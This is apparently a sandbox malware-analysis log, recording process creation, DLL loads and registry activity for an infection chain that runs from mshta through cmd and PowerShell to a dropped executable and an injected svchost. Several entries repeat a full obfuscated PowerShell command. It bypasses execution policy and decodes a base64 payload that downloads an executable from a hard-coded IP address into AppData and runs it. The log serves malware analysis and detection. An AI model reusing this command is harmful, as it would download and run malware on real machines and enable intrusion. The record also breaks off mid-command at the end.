Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\winnit.exe "C:\Users\user\AppData\Roaming\winnit.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3925.tmp" "c:\Users\user\AppData\Local\Temp\5zyziwbf\CSCADB73B4CC47C40A8804A92B1B0BD1E62.TMP"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\winnit.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

PowerShell case anomaly found

Source:	Binary string: $]q8C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.pdb source: powershell.exe, 00000003.00000002.2180711036.00000000054E4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: winnit.exe, 00000006.00000003.2185219526.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, winnit.exe, 00000006.00000003.2184427306.0000000003640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2313705453.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2350802126.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2315536638.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2350802126.0000000003B00000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: winnit.exe, 00000006.00000003.2185219526.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, winnit.exe, 00000006.00000003.2184427306.0000000003640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.2313705453.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2350802126.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2315536638.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2350802126.0000000003B00000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmF